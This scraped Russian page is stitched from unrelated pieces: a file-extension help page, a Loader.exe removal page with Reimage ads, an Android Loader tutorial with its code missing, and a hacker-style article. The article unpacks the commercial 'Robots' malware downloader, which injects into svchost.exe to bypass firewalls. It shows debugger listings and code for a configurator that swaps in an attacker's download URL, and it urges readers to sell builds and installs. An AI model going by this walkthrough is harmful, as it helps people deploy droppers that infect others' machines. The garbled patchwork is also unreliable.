Что такое лоадер файл
Если появилась ситуация, в которой Вы не можете открыть файл LOADER на своем компьютере - причин может быть несколько. Первой и одновременно самой важной (встречается чаще всего) является отсутствие соответствующей аппликации обслуживающей LOADER среди установленных на Вашем компьютере.
Самым простым способом решения этой проблемы является нахождение и скачивание соответствующей аппликации. Первая часть задания, уже выполнена, - программы для обслуживания файла LOADER Вы найдете ниже. Теперь достаточно скачать и установить соответствующую аппликацию.
В дальнейшей части этой страницы Вы найдете другие возможные причины, вызывающие проблемы с файлами LOADER.
Программа(ы), умеющие открыть файл .LOADER
Возможные проблемы с файлами в формате LOADER
Отсутствие возможности открытия и работы с файлом LOADER, совсем не должен значить, что мы не имеем установленного на своем компьютере соответствующего программного обеспечения. Могут выступать другие проблемы, которые также блокируют нам возможность работы с файлом . Ниже находится список возможных проблем.
- Повреждение открываемого файла LOADER.
- Ошибочные связи файла LOADER в записях реестра.
- Случайное удаление описания расширения LOADER из реестра Windows
- Некомплектная установка аппликации, обслуживающей формат LOADER
- Открываемый файл LOADER инфицирован нежелательным, вредным программным обеспечением.
- На компьютере слишком мало места, чтобы открыть файл LOADER.
- Драйверы оборудования, используемого компьютером для открытия файла LOADER неактуальные.
Если Вы уверены, что все перечисленные поводы отсутствуют в Вашем случае (или были уже исключены), файл LOADER должен сотрудничать с Вашими программами без каких либо проблем. Если проблема с файлом LOADER все-таки не решена, это может значить, что в этом случае появилась другая, редкая проблема с файлом LOADER. В таком случае остается только помощь специалиста.
Updated 12/31/1969
Похожие расширения
.4zx | Genero Zoom Module Settings |
.cd5 | Chasys Draw Image |
.fau | Simulation Laboratory Creator Collapsed Fault List |
.pekey | PhysicsEditor Key |
.phc | Home Embroidery |
.radius | Ruby-Radius Scipt |
.rpym | RenPy Module |
.tpkey | TexturePacker License |
Как связать файл с установленной программой?
Если Вы хотите связать какой-то файл с новой программой (напр. moj-plik.LOADER) Вы можете воспользоваться двумя вариантами. Первый и самый простой - это нажатие правой кнопкой мышки на избранный файл LOADER. Из открытого меню выберите опцию Выбрать программу по умолчанию", затем опцию "Пересматривать" и найти требуемую программу. Всю операцию необходимо утвердить нажатием кнопки OK.
Есть ли универсальный метод открытия неизвестных файлов?
Многие файлы содержат данные в виде текста или чисел. Возможно, что во время открытия неизвестных файлов (напр. LOADER) популярный в системе Windows простой редактор текста, которым является Notatnik позволит нам увидеть часть данных, закодированных в файле. Этот метод позволяет просмотреть содержимое многих файлов, однако не в такой форме, как программа, предназначенная для их обслуживания.
Loader.exe это исполняемый файл, который является частью Domgame Программа, разработанная RivalGaming, Программное обеспечение обычно о 27.65 MB по размеру.
Расширение .exe имени файла отображает исполняемый файл. В некоторых случаях исполняемые файлы могут повредить ваш компьютер. Пожалуйста, прочитайте следующее, чтобы решить для себя, является ли Loader.exe Файл на вашем компьютере - это вирус или троянский конь, который вы должны удалить, или это действительный файл операционной системы Windows или надежное приложение.
Loader.exe безопасен, это вирус или вредоносная программа?
Первое, что поможет вам определить, является ли конкретный файл законным процессом Windows или вирусом, - это расположение самого исполняемого файла. Например, такой процесс, как Loader.exe, должен запускаться из C: \ Program Files \ domgame \ domgame.exe, а не где-либо еще.
Для подтверждения откройте диспетчер задач, выберите «Просмотр» -> «Выбрать столбцы» и выберите «Имя пути к изображению», чтобы добавить столбец местоположения в диспетчер задач. Если вы обнаружите здесь подозрительный каталог, возможно, стоит дополнительно изучить этот процесс.
Еще один инструмент, который иногда может помочь вам обнаружить плохие процессы, - это Microsoft Process Explorer. Запустите программу (не требует установки) и активируйте «Проверить легенды» в разделе «Параметры». Теперь перейдите в View -> Select Columns и добавьте «Verified Signer» в качестве одного из столбцов.
Если статус процесса «Проверенная подписывающая сторона» указан как «Невозможно проверить», вам следует взглянуть на процесс. Не все хорошие процессы Windows имеют метку проверенной подписи, но ни один из плохих.
Самые важные факты о Loader.exe:
Если у вас возникли какие-либо трудности с этим исполняемым файлом, перед удалением Loader.exe вы должны определить, заслуживает ли он доверия. Для этого найдите этот процесс в диспетчере задач.
Найдите его местоположение (оно должно быть в C: \ Program Files \ domgame) и сравните его размер с приведенными выше фактами.
Кроме того, функциональность вируса может сама повлиять на удаление Loader.exe. В этом случае необходимо включить Безопасный режим с поддержкой сети - безопасная среда, которая отключает большинство процессов и загружает только самые необходимые службы и драйверы. Когда вы можете запустить программу безопасности и полный анализ системы.
Могу ли я удалить или удалить Loader.exe?
Не следует удалять безопасный исполняемый файл без уважительной причины, так как это может повлиять на производительность любых связанных программ, использующих этот файл. Не забывайте регулярно обновлять программное обеспечение и программы, чтобы избежать будущих проблем, вызванных поврежденными файлами. Что касается проблем с функциональностью программного обеспечения, проверяйте обновления драйверов и программного обеспечения чаще, чтобы избежать или вообще не возникало таких проблем.
Согласно различным источникам онлайн, 9% людей удаляют этот файл, поэтому он может быть безвредным, но рекомендуется проверить надежность этого исполняемого файла самостоятельно, чтобы определить, является ли он безопасным или вирусом. Лучшая диагностика для этих подозрительных файлов - полный системный анализ с Reimage. Если файл классифицируется как вредоносный, эти приложения также удаляют Loader.exe и избавляются от связанного вредоносного ПО.
Однако, если это не вирус и вам необходимо удалить Loader.exe, вы можете удалить DomGame со своего компьютера с помощью программы удаления, которая должна находиться по адресу: C: \ Program Files \ DomGame \ uninst.exe. Если вы не можете найти программу удаления, вам может потребоваться удалить DomGame, чтобы полностью удалить Loader.exe. Вы можете использовать функцию «Добавить / удалить программу» в Панели управления Windows.
- 1. в Меню Пуск (для Windows 8 щелкните правой кнопкой мыши в нижнем левом углу экрана), нажмите Панель управления, а затем под Программы:
o Windows Vista / 7 / 8.1 / 10: нажмите Удаление программы.
o Windows XP: нажмите Установка и удаление программ.
- 2. Когда вы найдете программу Domgameщелкните по нему, а затем:
o Windows Vista / 7 / 8.1 / 10: нажмите Удалить.
o Windows XP: нажмите Удалить or Изменить / Удалить вкладка (справа от программы).
- 3. Следуйте инструкциям по удалению Domgame.
Наиболее распространенные ошибки Loader.exe, которые могут возникнуть:
• «Ошибка приложения Loader.exe».
• «Ошибка Loader.exe».
• «Loader.exe столкнулся с проблемой и должен быть закрыт. Приносим извинения за неудобства».
• «Loader.exe не является допустимым приложением Win32».
• «Loader.exe не запущен».
• «Loader.exe не найден».
• «Не удается найти Loader.exe».
• «Ошибка запуска программы: Loader.exe».
• «Неверный путь к приложению: Loader.exe».
Аккуратный и опрятный компьютер - это один из лучших способов избежать проблем с DomGame. Это означает выполнение сканирования на наличие вредоносных программ, очистку жесткого диска cleanmgr и ПФС / SCANNOWудаление ненужных программ, мониторинг любых автозапускаемых программ (с помощью msconfig) и включение автоматических обновлений Windows. Не забывайте всегда делать регулярные резервные копии или хотя бы определять точки восстановления.
Если у вас возникла более серьезная проблема, постарайтесь запомнить последнее, что вы сделали, или последнее, что вы установили перед проблемой. Использовать resmon Команда для определения процессов, вызывающих вашу проблему. Даже в случае серьезных проблем вместо переустановки Windows вы должны попытаться восстановить вашу установку или, в случае Windows 8, выполнив команду DISM.exe / Online / Очистка-изображение / Восстановить здоровье, Это позволяет восстановить операционную систему без потери данных.
Чтобы помочь вам проанализировать процесс Loader.exe на вашем компьютере, вам могут пригодиться следующие программы: Менеджер задач безопасности отображает все запущенные задачи Windows, включая встроенные скрытые процессы, такие как мониторинг клавиатуры и браузера или записи автозапуска. Единый рейтинг риска безопасности указывает на вероятность того, что это шпионское ПО, вредоносное ПО или потенциальный троянский конь. Это антивирус обнаруживает и удаляет со своего жесткого диска шпионское и рекламное ПО, трояны, кейлоггеры, вредоносное ПО и трекеры.
Обновлено ноябрь 2021 г .:
Мы рекомендуем вам попробовать это новое программное обеспечение, которое исправляет компьютерные ошибки, защищает их от вредоносных программ и оптимизирует производительность вашего ПК. Этот новый инструмент исправляет широкий спектр компьютерных ошибок, защищает от таких вещей, как потеря файлов, вредоносное ПО и сбои оборудования.
(опциональное предложение для Reimage - Cайт | Лицензионное соглашение | Политика конфиденциальности | Удалить)
Глобальная концепция: разработаны для работы с данными: загрузки (сохранения) данных (создание отдельного потока загрузки, загрузка, обработка ошибок, оповещение о состоянии загрузки). Нас интересует (в данный момент) одно частное применение лоадеров, а именно использование при пересоздании Activity (при изменении конфигурации) для сохранения состояния Activity
Лоадер – это компонент Android, который через класс LoaderManager связан с жизненным циклом Activity и Fragment. Это позволяет использовать их без опасения, что данные будут утрачены при закрытии приложения или результат вернется не в тот коллбэк. Разберем простейший пример (который хоть и простейший, но требует немало кода, это один из недостатков лоадеров). Создаем класс лоадера (для простоты он не будет грузить данные с сервера, а лишь имитировать загрузку):
В методе loadInBackground() - мы должны загрузить данные Integer - в данном примере это контейнер для данных (int), которые загружает наш лоадер.
В отличие от AsyncTask-а лоадер не нужно запускать вручную, это делается неявным образом через класс LoaderManager. У этого класса есть два метода с одинаковой сигнатурой:
- int id - идентификатор лоадера для различения их между собой;
- Bundle args - класс Bundle, с помощью которого передаем аргументы для создания лоадера;
- LoaderManager.LoaderCallbacks callback - Callback для создания лоадера и получения от него результата работы:
- onCreateLoader(int id, Bundle args) - необходимо вернуть нужный лоадер в зависимости от id, используя параметры из Bundle. Вызывается автоматически, при создании лоадера;
- onLoadFinished(Loader loader, D data) - в параметре D мы получим результат работы лоадера. Вызывается после того, как лоадер загрузит даннные. Для определения этого момента менеджер регистрирует слушатель OnLoadCompleteListener , который прослушивает события;
- onLoaderReset(Loader loader) - очищаем все данные, чвязанные с данным лоадером.
Создадим экземпляр LoaderCallback для нашего StubLoader’a:
И теперь запускаем лоадер:
Результат: через две секунды после запуска Activity покажется Toast. Теперь, если мы изменим конфигурацию Activity, например, перевернём устройство, то работа лоадера должна начаться заново и Toast должен показаться через 2 секунды. Но он показывается мнгновенно! В чём магия?
Лоадер запускается в методе initLoader класса LoaderManager. Лоадер создается при первом запуске Activity, но при последующих запусках он не пересоздаётся. Вместо этого LoaderManager заменяет экземпляр LoaderCallbacks на новый переданный, и если данные загрузились, они передаются в onLoadFinished.
Таким образом нам не нужно беспокоиться об обновлении данных и создании нового лоадера, но если данные необходимо перезагрузить, можно выполнить restartLoader.
Жизненный цикл лоадера
Порядок работы менеджера загрузчиков (LoaderManager) во время создания активности:
В этой статье мы рассмотрим как имея один билд лоадера сделать для него конфигуратор. Тренироваться мы будем на очень известном лоадере robots. Для тех, кто не знает что это такое приведу небольшую цитату от разработчика:
Мы покупаем загрузки, тратим деньги, порою вообще большие суммы, а ведь легко можем получать от этих же загрузок большую отдачу, только если сразу передать на загрузку лоадер Robots. Тут мы получаем и удобную, а главное свою, а не чужую статистику и возможность грузить еще не ограниченное число файлов друзьям, знакомым за один подход, так и сами файлы будут грузиться качественнее. Вы наверняка ощутите отдачу как только начнете, да и добрую часть денег сэкономить можно, зачем лишнее тратить на "недогруженные" загрузки 😉 …
Приводить все характеристики данного продукта нет смысла, все легко находиться в интернете при должном желании. Почему я выбрал именно этот лоадер для опытов? Да потому, что он очень популярен и судя по заявлениям автора в него встроена мощная защита от реверсеров, т.е. от таких людей как мы.
Что такое лоадер. Это небольшой файлик, который в обход фаерволов загружает нужный нам файл на машину юзера и незаметно его запускает. Так что грузить файлы с помощью лоадера намного лучше, чем грузить файлы сразу. Так что вещь в хозяйстве незаменимая.
Анализ
Ну что же, приступим. На руках имеем 1 билд лоадера который безвозмездно пожертвовали нам добрые люди. Имя файла «loader.exe», размер
6kb. Натравим на файл любой анализатор (PEiD, DiE, Protection ID) и узнаем, что файл запакован MEW 11 SE 1.2. Это не слишком большая проблема, берём любимый отладчик OllyDbg и вперед. Загружаем в Olly наш файл и оказываемся на точке входа, где видим примерно следующее:
0090B55F >- E9 F04BAFFF JMP loader.00400154
Перейдём по адресу 00400154 и увидим следующий код:
00400154 BE 1CA09000 MOV ESI,loader.0090A01C
00400159 8BDE MOV EBX,ESI
0040015B AD LODS DWORD PTR DS:[ESI]
Теперь листаем код не много вниз, пока не наткнемся на следующие команды:
004001F0 FF53 F4 CALL DWORD PTR DS:[EBX-C]
004001F3 AB STOS DWORD PTR ES:[EDI]
004001F4 85C0 TEST EAX,EAX
004001F6 ^ 75 E5 JNZ SHORT loader.004001DD
004001F8 C3 RETN <- вот сюда нужно поставить breakpoint
Значит ставим breakpoint по адресу 004001F8 и запускаем программу на исполнение. Когда Olly прервётся, в стеке будет примерно следующие:
0012FFC0 00909000 loader.00909000 <- начало криптора
0012FFC4 7C816FF7 RETURN to kernel32.7C816FF7
Вот это нам и надо, теперь будем распаковывать «мега приватный» криптор 🙂 Делаем в Olly F8 (Step over) и перемещаемся на адрес 00909000:
00909000 CE INTO
00909001 9B WAIT
00909002 9F LAHF
00909003 98 CWDE
00909004 98 CWDE
Примитивный однобайтовый мусор у нас перед глазами, применяется он чтобы сбить сигнатурную маску у аверов. В теории это так - есть основной «скелет» команд, которые выполняют основную работу, а между ними внедряется случайное число мусорных команд. Но технология давно устарела и современные аверы справляются с этой задачей. Тем более мусор в данном лоадере выделяется на фоне значащих команд. Ладно, нас это не интересует, надо снять криптор чтобы уже исследовать сам лоадер. В общем, в крипторе особо интересного ничего нету, остановимся лишь на нескольких моментах:
009080E5 0F31 RDTSC // получаем количество тактов
009080E7 2BC3 SUB EAX,EBX // разность между двумя замерами
009080E9 EB 01 JMP SHORT loader.009080EC
009080EB 90 NOP // занопили мусорный байт
009080EC 3D 00000001 CMP EAX,1000000 // если больше 1000000h
009080F1 EB 01 JMP SHORT loader.009080F4
009080F3 90 NOP // занопили мусорный байт
009080F4 - 77 FE JA SHORT loader.009080F4 // то застрянем тут
RDTSC (Read Time Stamp Counter) - ассемблерная инструкция для платформы x86, читающая счётчик TSC (Time Stamp Counter) и возвращающая в регистрах EDX:EAX 64-битное количество тактов с момента последнего сброса процессора. RDTSC поддерживается в процессорах Pentium и старше. Опкод: 0F 31.
Старая отладка нас не интересует, идём дальше, в крипторе вовсю используется приём с прыжком через мусорный байт, чтобы сбить с толку реверсера бредовым листингом, как это выглядит:
0090811F /EB 01 JMP SHORT loader.00908122
00908121 |EA E305EB01 EBEB JMP FAR EBEB:01EB05E3
00908128 DF59 85 FISTP WORD PTR DS:[ECX-7B]
0090812B C058 EB 01 RCR BYTE PTR DS:[EAX-15],1
0090812F EA BA000000 00EB JMP FAR EB00:000000BA
Кроме первой команды JMP SHORT loader.00908122 ничего из этого участка кода не понять, но если занопись мусорные байты, то листинг становиться более читабельным:
0090811F /EB 01 JMP SHORT loader.00908122
00908121 |90 NOP
00908122 \E3 05 JECXZ SHORT loader.00908129
00908124 EB 01 JMP SHORT loader.00908127
00908126 90 NOP
00908127 ^ EB DF JMP SHORT loader.00908108
00908129 59 POP ECX
0090812A 85C0 TEST EAX,EAX
0090812C 58 POP EAX
0090812D EB 01 JMP SHORT loader.00908130
0090812F 90 NOP
Ну вот, совсем другое дело. Едем дальше. Чуть позже произойдёт исключение с ошибкой записи в память:
00404996 BB 0000F7BF MOV EBX,BFF70000 // адрес недоступный для записи
0040499B 85C9 TEST ECX,ECX
0040499D 59 POP ECX
0040499E 64:8937 MOV DWORD PTR FS:[EDI],ESI
004049A1 B8 002C2B1F MOV EAX,1F2B2C00 // байты для записи
004049A6 8703 XCHG DWORD PTR DS:[EBX],EAX // ошибка
Лоадер искусственно генерирует исключение и сам же его обрабатывает, такая техника помогает остановить эмулятор отдельный антивирусов, но она, как и все остальное, безвозвратно устарела. Дальше будет ещё исключение, проходим его и наконец перед нами место, которое можно принять за начало лоадера:
00401E78 803D F8464000 00 CMP BYTE PTR DS:[4046F8],0
00401E7F 75 0E JNZ SHORT loader.00401E8F
00401E81 C605 F8464000 01 MOV BYTE PTR DS:[4046F8],1
00401E88 BA 991E4000 MOV EDX,loader.00401E99
00401E8D EB 05 JMP SHORT loader.00401E94
Теперь нужно сдампить файл и привести его в человеческий вид. Полученный дамп будет весить 5
Мб, что ну никак не годиться, берём в руки любой PE-editor и отрезаем всё лишнее. Было:
секция 1: 00001000 00509000 00001000 00509000 C00000E0
секция 2: ТuЫЉ лФ 0050A000 00002000 0050A000 00002000 C00000E0
секция 1: code 00001000 00509000 00001000 00003A00 E00000E0
Ещё, в добавок к этому, надо занулить директорию импорта ImportTable и сделать SizeOfHeaders = 1000h, иначе файл упадёт при запуске. После всех этих манипуляций размер файла стал 18.5
Кб - это уже не 5 Мб, а если запаковать файл PeCompact, то размер будет 6 Кб, что вполне приемлемо для лоадера. Т.к. у нашего лоадера нету импорта, то он не запуститься на win 2000. Для того, чтобы файл нормально запускался и там нужно добавить хотя бы 1 функцию, сделать это можно вручную и ничего сложного в этом
нету.
2500h: 00 00 00 00 00 00 00 00 00 00 00 00 28 25 00 00 . (%..
2510h: 10 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 .0.
2520h: 00 00 00 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 . kernel32
2530h: 2E 64 6C 6C 00 00 B7 00 45 78 69 74 50 72 6F 63 .dll. ExitProc
2540h: 65 73 73 00 00 00 00 00 00 00 00 00 00 00 00 00 ess.
И, соответственно, ImportTable address = 2500h и size = 14h.
Теперь можно анализировать лоадер и искать нужное нам место для подменяя url на наш.
Принцип работы нас не интересует, нам важно сделать конфигуратор.
Основная часть
Немного посмотрев лоадер в Olly я выяснил, что все строки шифруются одной процедурой:
0040141E 55 PUSH EBP // начало
00401486 AC LODS BYTE PTR DS:[ESI] // esi = строка
00401487 84C0 TEST AL,AL // пока символ <> 0
00401489 74 13 JE SHORT dump_.0040149E
0040148B FEC2 INC DL // увеличиваем счётчик
0040148D 8ACA MOV CL,DL
0040148F 80E1 1F AND CL,1F // счётчик AND 1Fh
00401492 80C1 61 ADD CL,61 // счётчик ADD 61h
00401495 FECE DEC DH // уменьшаем счётчик
00401497 32CE XOR CL,DH // ксорим 2 счетчика
00401499 32C1 XOR AL,CL // ксорим символ строки
0040149B AA STOS BYTE PTR ES:[EDI] // записываем в результат
0040149C ^ EB E8 JMP SHORT dump_.00401486
Алгоритм очень простой и обратимый. Т.е. если на вход подать зашифрованную строку, то она расшифруется, а если уже расшифрованную, то соответственно зашифруется. Осталось только найти нужную нам строку. Для обхода фаерволов применяется старый метод с запуском доверенного приложения «svchost.exe» и инъектом в него кода, который скачивает нужный файл. Как я это узнал?
Да для этого надо всего лишь пройтись по лоадеру разбирая каждую инструкцию, ничего сложного в этом нет. В данном случае инъектиться весь образ лоадера. Значит, чтобы вплотную подобраться к нужной нам строке ставим breakpoint на CreateProcessA и запускаем лоадер. Через пару секунд прервёмся на этом месте:
7C802367 >/$ 8BFF MOV EDI,EDI
7C802369 |. 55 PUSH EBP
И в стеке будет следующее:
0012FF30 0040226E /CALL to CreateProcessA
0012FF34 00000000 |ModuleFileName = NULL
0012FF38 004048C2 |CommandLine = "svchost.exe" // доверенное приложение
Перемещаемся дальше, имеем в Olly по адресу ZwCreateThread, и что же мы видим:
7C90D7D2 > 68 19184000 PUSH 401819 // адрес перехватчика
7C90D7D7 C3 RETN
А эта функция, оказывается, перехвачена и всё самое интересное будет происходить по адресу 401819. По-этому идём
туда и ставим breakpoint, жмём F9 (run) в Olly.
Когда прервёмся увидим примерно такой код:
00401819 55 PUSH EBP
0040181A 8BEC MOV EBP,ESP
0040181C 83C4 DC ADD ESP,-24
Листаем вниз, пока не увидим следующие инструкции:
00401959 C786 B8000000 8E1B400>MOV DWORD PTR DS:[ESI+B8], 00401B8E
00401963 FF75 EC PUSH DWORD PTR SS:[EBP-14]
00401966 8F86 AC000000 POP DWORD PTR DS:[ESI+AC]
0040196C 8B35 D4494000 MOV ESI,DWORD PTR DS:[4049D4]
00401972 8B3D CC494000 MOV EDI,DWORD PTR DS:[4049CC] // ZwCreateThread
00401978 A5 MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
00401979 66:A5 MOVS WORD PTR ES:[EDI],WORD PTR DS:[ESI]
0040197B FF75 F0 PUSH DWORD PTR SS:[EBP-10]
0040197E FF75 20 PUSH DWORD PTR SS:[EBP+20]
00401981 FF75 F4 PUSH DWORD PTR SS:[EBP-C]
00401984 FF75 18 PUSH DWORD PTR SS:[EBP+18]
00401987 FF75 F8 PUSH DWORD PTR SS:[EBP-8]
0040198A FF75 10 PUSH DWORD PTR SS:[EBP+10]
0040198D FF75 0C PUSH DWORD PTR SS:[EBP+C]
00401990 FF75 08 PUSH DWORD PTR SS:[EBP+8]
00401993 FF15 D0494000 CALL DWORD PTR DS:[4049D0] // ZwCreateThread
На этом участке происходит примерно следующее: снимаем перехватчик с функции ZwCreateThread и вызываем оригинальную функцию, перед этим меняем адрес начала нового потока на 00401B8E. Команды по этому адресу будут выполнены в контексте доверенного процесса. Вот то, что нам нужно. Для того, чтобы оказаться по адресу 00401B8E нам потребуется сделать следующее. Ставим breakpoint на адрес 0040197B, прерываемся на нём. Дальше переходим в olly на 00401B8E и нажимаем правую кнопку мыши, в выпавшем меню выбираем «New origin here», т.е. мы передали управление на этот адрес. Помните в начале мелькал адрес 0040141E, это процедура, которая расшифровывает строки, вот теперь ставим breakpoint на её
начало. Прервёмся когда, в стеке будет следующее:
0012F32C 00401619 dump_.00401619
0012F330 00404088 dump_.00404088
0012F334 00404877 dump_.00404877 // вот адрес который нам нужен
Если дойди до конца процедуры
004014A4 61 POPAD
004014A5 C9 LEAVE
004014A6 C2 0400 RETN 4
то по адресу 00404877 будет наша искомая строка:
Ну вот, наше исследование подошло к концу, осталось заменить эту строку на любую другую, которую мы захотим, для этого нужно зашифровать ее и записать в файл.
Алгоритм на дельфи с асм вставками будет выглядеть примерно так:
res:array [1..45] of byte;
mov esi,s // помещаем в esi адрес строки
lea edi,res // помещаем в edi адрес выходного буфера
LODS BYTE PTR DS:[ESI] // помещаем в AL символ из нашей строки
JE @@exit // конец строки?
INC DL // эти действия мы разбирали ранее
STOS BYTE PTR ES:[EDI] // помещаем полученный байт в выходной массив
Вот так просто мы написали конфигуратор к лоадеру, цена которому 800 $. Для этого нужно было только немного терпения и небольшой опыт в реверсе. Авторам можно посоветовать за такие деньги в несколько раз больше трудиться над продуктом. С уверенностью можно утверждать, что цена явно завышена.
Бонус
К статье прилагается распакованный лоадер, готовый конфигуратор, его исходники и скрипты. Всё это доступно для ознакомления, чтобы каждый мог посмотреть, что же за софт продаётся за такие деньги. Распакованный лоадер прекрасно пакуется и криптуется, благодаря этому каждый может попробовать данный софт. Никаких вирусов и т.д. в софте нету.
Использование
Вот вроде бы и всё, использовать можно как угодно, продавать чистые билды, самому грузить файлы, продавать загрузки и т.д.
Читайте также: